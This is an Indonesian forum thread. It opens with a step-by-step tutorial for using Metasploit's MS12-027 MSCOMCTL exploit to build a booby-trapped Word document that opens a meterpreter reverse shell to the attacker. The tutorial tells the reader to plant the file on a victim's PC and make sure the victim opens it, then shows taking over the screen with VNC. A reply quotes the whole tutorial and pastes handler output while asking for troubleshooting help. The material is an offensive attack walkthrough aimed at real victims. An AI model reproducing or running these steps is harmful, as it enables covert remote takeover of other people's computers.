[Share] Metasploit Dengan Word MS12 027 MSCOMCTL
#1
hallo bro, ini thread pertama ane semoga aja ga double post dan dapet free email @ibt.or.id #ngarep hehe..

Targets

MS office 2007 on windows XP SP 3
MS office 2010 on windows 7/SP1

Requirement

Attacker: kali
Victim PC: Windows XP

Open terminal ketik msfconsole
lalu ketik lagi di msfnya:

use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 10.72.56.24 (IP Attacker)
msf exploit (ms12_027_mscomctl_bof)>exploit

[Image: Screenshot_5.png]

Setelah berhasil menghasilkan doc file, itu disimpan di /root/.msf4/local/msf.doc

ketik lagi di msfnya:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.72.56.24 (IP Attacker)
exploit

nah,ini tahap yg paling susah.
anda harus taruh backdoor itu di PC korban.. dan pastikan korban membuka file doc kita.

penampakan setelah korban membuka..

[Image: Screenshot_7.png]

oke kita coba liat aksi dari si korban.

ketik: run vnc -p 4545

[Image: Screenshot_9.png]

sekian dan terima kasih, semoga bermanfaat.

#2
Kayanya udah pernah dishare sama clound hehehe

#3
(05-08-2015, 06:22 AM)Creed Wrote: hallo bro, ini thread pertama ane semoga aja ga double post dan dapet free email @ibt.or.id #ngarep hehe..

Targets

MS office 2007 on windows XP SP 3
MS office 2010 on windows 7/SP1

Requirement

Attacker: kali
Victim PC: Windows XP

Open terminal ketik msfconsole
lalu ketik lagi di msfnya:

use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 10.72.56.24 (IP Attacker)
msf exploit (ms12_027_mscomctl_bof)>exploit

[Image: Screenshot_5.png]

Setelah berhasil menghasilkan doc file, itu disimpan di /root/.msf4/local/msf.doc

ketik lagi di msfnya:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.72.56.24 (IP Attacker)
exploit

nah,ini tahap yg paling susah.
anda harus taruh backdoor itu di PC korban.. dan pastikan korban membuka file doc kita.

penampakan setelah korban membuka..

[Image: Screenshot_7.png]

oke kita coba liat aksi dari si korban.

ketik: run vnc -p 4545

[Image: Screenshot_9.png]

sekian dan terima kasih, semoga bermanfaat.

bang tanya,, pdahal korban uda ngeksekusi filenya, tp kog metasploitnya nggk ada respon ya

msf exploit(handler) > set lhost 192.168.43.1*
lhost => 192.168.43.1*
msf exploit(handler) > exploit

[*]Started reverse handler on 192.168.43.1*:443
[*]Starting the payload handler...
 
uda cuman sampe gitu.. ga ada perbuhn sama sekali,,, mohon pencerahannya bang






Users browsing this thread: 1 Guest(s)